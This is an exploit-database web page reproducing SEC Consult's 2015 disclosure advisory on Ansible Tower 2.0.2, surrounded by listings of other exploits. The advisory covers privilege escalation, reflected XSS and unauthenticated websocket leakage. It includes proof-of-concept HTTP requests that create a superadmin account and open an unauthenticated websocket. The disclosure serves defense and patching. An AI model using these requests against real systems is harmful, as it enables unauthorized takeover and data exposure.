Menu

Improved exploit search engine. Try it out

"Ansible Tower 2.0.2 - Multiple Vulnerabilities"

Author

"SEC Consult"

Platform

multiple

Release date

2015-01-14

Release Date Title Type Platform Author
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-10 "Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access" dos multiple "Google Security Research"
2019-07-09 "Firefox 67.0.4 - Denial of Service" dos multiple "Tejas Ajay Naik"
2019-07-03 "Symantec DLP 15.5 MP1 - Cross-Site Scripting" webapps multiple "Chapman Schleiss"
2019-07-01 "CyberPanel 1.8.4 - Cross-Site Request Forgery" webapps multiple "Bilgi Birikim Sistemleri"
2019-07-01 "Sahi pro 8.x - Directory Traversal" webapps multiple "Alexander Bluestein"
2019-07-01 "SAP Crystal Reports - Information Disclosure" webapps multiple "Mohamed M.Fouad"
2019-07-01 "Varient 1.6.1 - SQL Injection" webapps multiple "Mehmet EMIROGLU"
2019-06-26 "Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion" dos multiple "Google Security Research"
2019-06-24 "GrandNode 4.40 - Path Traversal / Arbitrary File Download" webapps multiple "Corey Robinson"
2019-06-25 "SuperDoctor5 - 'NRPE' Remote Code Execution" remote multiple "Simon Gurney"
2019-06-18 "Sahi pro 8.x - Cross-Site Scripting" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 8.x - SQL Injection" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 7.x/8.x - Directory Traversal" webapps multiple "Goutham Madhwaraj"
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - Type Confusion" dos multiple "X41 D-Sec GmbH"
2019-06-05 "Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free" dos multiple "Google Security Research"
2019-05-28 "Phraseanet < 4.0.7 - Cross-Site Scripting" webapps multiple "Krzysztof Szulski"
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-29 "Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation" dos multiple "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script" dos multiple "Google Security Research"
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2018-08-16 "Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "SEC Consult"
2018-07-13 "Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure" webapps php "SEC Consult"
2018-07-13 "WAGO e!DISPLAY 7300T - Multiple Vulnerabilities" webapps php "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
2018-04-24 "WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting" webapps java "SEC Consult"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2018-03-05 "ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection" webapps php "SEC Consult"
2017-12-07 "OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting" webapps php "SEC Consult"
2017-10-18 "Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities" webapps php "SEC Consult"
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-05-09 "I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting" webapps php "SEC Consult"
2017-03-22 "Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-03-01 "Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting" webapps xml "SEC Consult"
2016-10-11 "RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection" webapps xml "SEC Consult"
2016-07-25 "Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities" webapps java "SEC Consult"
2016-02-10 "Yeager CMS 1.2.1 - Multiple Vulnerabilities" webapps php "SEC Consult"
2015-12-10 "Skybox Platform < 7.0.611 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-06-30 "Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-14 "Ansible Tower 2.0.2 - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2014-12-23 "NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-11-06 "Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-07-16 "BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities" webapps linux "SEC Consult"
2014-07-14 "Shopizer 1.1.5 - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-07-01 "IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-06-09 "WebTitan 4.01 (Build 68) - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-04-24 "WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion" webapps php "SEC Consult"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/35786/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/35786/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/35786/35433/ansible-tower-202-multiple-vulnerabilities/download/", "exploit_id": "35786", "exploit_description": "\"Ansible Tower 2.0.2 - Multiple Vulnerabilities\"", "exploit_date": "2015-01-14", "exploit_author": "\"SEC Consult\"", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
SEC Consult Vulnerability Lab Security Advisory < 20150113-1 >
=======================================================================
              title: Privilege Escalation & XSS & Missing Authentication
            product: Ansible Tower
 vulnerable version: <=2.0.2
      fixed version: >=2.0.5
             impact: high
           homepage: http://www.ansible.com/tower
              found: 2014-10-15
                 by: Manuel Hofer
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Ansible Tower is the easy-to-use UI and dashboard and REST API for Ansible.
Centralize your Ansible infrastructure from a modern UI, featuring role-based
access control, job scheduling, and graphical inventory management. Tower's
REST API and CLI make it easy to embed Tower into existing tools and processes.
Tower now includes real-time output of playbook runs, an all-new dashboard and
expanded out-of-the-box cloud support."

source: http://www.ansible.com/tower


Business recommendation:
------------------------
Attackers are able to elevate privileges and gain full control over Ansible
Tower and therefore access to sensitive data of other customers.

It is assumed that further vulnerabilities exist as only a short crash test has
been performed. Therefore it is recommended to perform a thorough security
review by security professionals.


Vulnerability overview/description:
-----------------------------------
1) Privilege Escalation
Ansible Tower provides the feature to create multiple organizations inside
one tower instance. Each organization can have an unlimited number of users
and administrators which are only allowed to perform actions in the context
of their own organization. Due to missing validation of the "is_superuser"
parameter during user creation, organization admins can create superadmin
accounts and therefore elevate their privileges to gain full control of
Ansible Tower.


2) Reflected Cross-Site Scripting
Several parts of the Ansible Tower API have been identified to be vulnerable
against reflected XSS attacks which can be used by an attacker to steal user
sessions.


3) Missing Websocket Authentication / Information Leakage
The Ansible Tower UI uses Websockets to notify clients about recent events.
This part of the application lacks authentication as well as authorization,
leading to internal data about e.g. scheduled events, being leaked to
unauthorized and/or unauthenticated users.


Proof of concept:
-----------------
1) Privilege Escalation (Org-Admin to Superadmin)
Using the following request, a user with administrative privileges limited to an
organization, can create a superadmin account with access to all organizations:

> POST /api/v1/organizations/3/users/ HTTP/1.1
> Host: $host
> Authorization: Token c3f03841403a17ed79753e057167a62144dae7df
> X-Auth-Token: Token c3f03841403a17ed79753e057167a62144dae7df
>
> {"first_name":"Org1admin_superuser","last_name":"Org1admin_superuser",
> "email":"Org1admin_superuser@local.local","organization":3,
> "username":"Org1admin_superuser","password":"Org1admin_superuser",
> "password_confirm":"Org1admin_superuser","is_superuser":"true","ldap_user":""}


2) Reflected Cross-Site Scripting
The following URL parameters have been identified to be vulnerable against
reflected cross-site scripting:
 * URL: /api/v1/credentials/, Parameter: order_by
 * URL: /api/v1/inventories/, Parameter: order_by
 * URL: /api/v1/projects/, Parameter: order_by
 * URL: /api/v1/schedules/, Parameter: next_run
 * URL: /api/v1/users/3/permissions/, Parameter: order_by

It is likely that similar issues exist in other parts of the application.


3) Missing Websocket Authentication / Information Leakage
An attacker can setup a websocket connection without providing any credentials
as follows. By issuing a GET request to "https://tower:8080/socket.io/1/" the
server responds with the following string:
> 43167469538:60:60:websocket,xhr-multipart,htmlfilonp-polling[...]

The first integer value can further be used to establish a websocket connection:
#~% openssl s_client -verify 0 -connect tower:8080
> GET /socket.io/1/websocket/43167469538 HTTP/1.1
> Host: tower:8080
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Sec-WebSocket-Version: 13
> Origin: https://tower
> Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
> Connection: keep-alive, Upgrade
> Pragma: no-cache
> Cache-Control: no-cache
> Upgrade: websocket
>
>

The websocket key seen above, has been taken from the examples of the wikipedia
page on WebSockets (http://de.wikipedia.org/wiki/WebSocket) as it is only used
to verify that the server received and understood the message.

The server responds as follows:
< HTTP/1.1 101 Switching Protocols
< Upgrade: websocket
< Connection: Upgrade
< Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=

Now that the websocket connection has been established, data that would
otherwise be presented to logged in users to display status updates for "job
related events" inside tower, can now be observed without any authentication.
Following an example of data received through the websocket connection.
> 5::/socket.io/jobs:{"args":{"status":"pending","project_id":56,
> "unified_job_id":61,"event":"status_changed","endpoint":"/socket.io/jobs"},
> "name":"status_changed"}

Even tough no critical information has been identified leaking through the
websocket, this should still be protected with proper authentication and
authorization because it might aid an attacker in conducting further attacks.


Vulnerable / tested versions:
-----------------------------
Ansible Tower version v2.0.2 has been tested which was the most recent version
at the time of discovery.


Vendor contact timeline:
------------------------
2014-10-22: Contacting vendor through security@ansible.com and asking for
            cryptographic material in order to securely send advisory.
2014-10-22: Sending unencrypted advisory as requested by vendor.
2014-10-22: Vendor suggests to release a fix prior to 12.12.2014
2014-10-28: Vendor confirms reported vulnerabilities
2014-12-10: Vendor releases fixed Version 2.0.5
2015-01-13: SEC Consult releases security advisory


Solution:
---------
Upgrade to a fixed version of Ansible Tower >= 2.0.5


Workaround:
-----------
For vulnerabilities 1 to 2, no workaround can be applied.
3 can be circumvented by blocking access to TCP port 8080 on your
Ansible Tower installation.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Manuel Hofer / 2015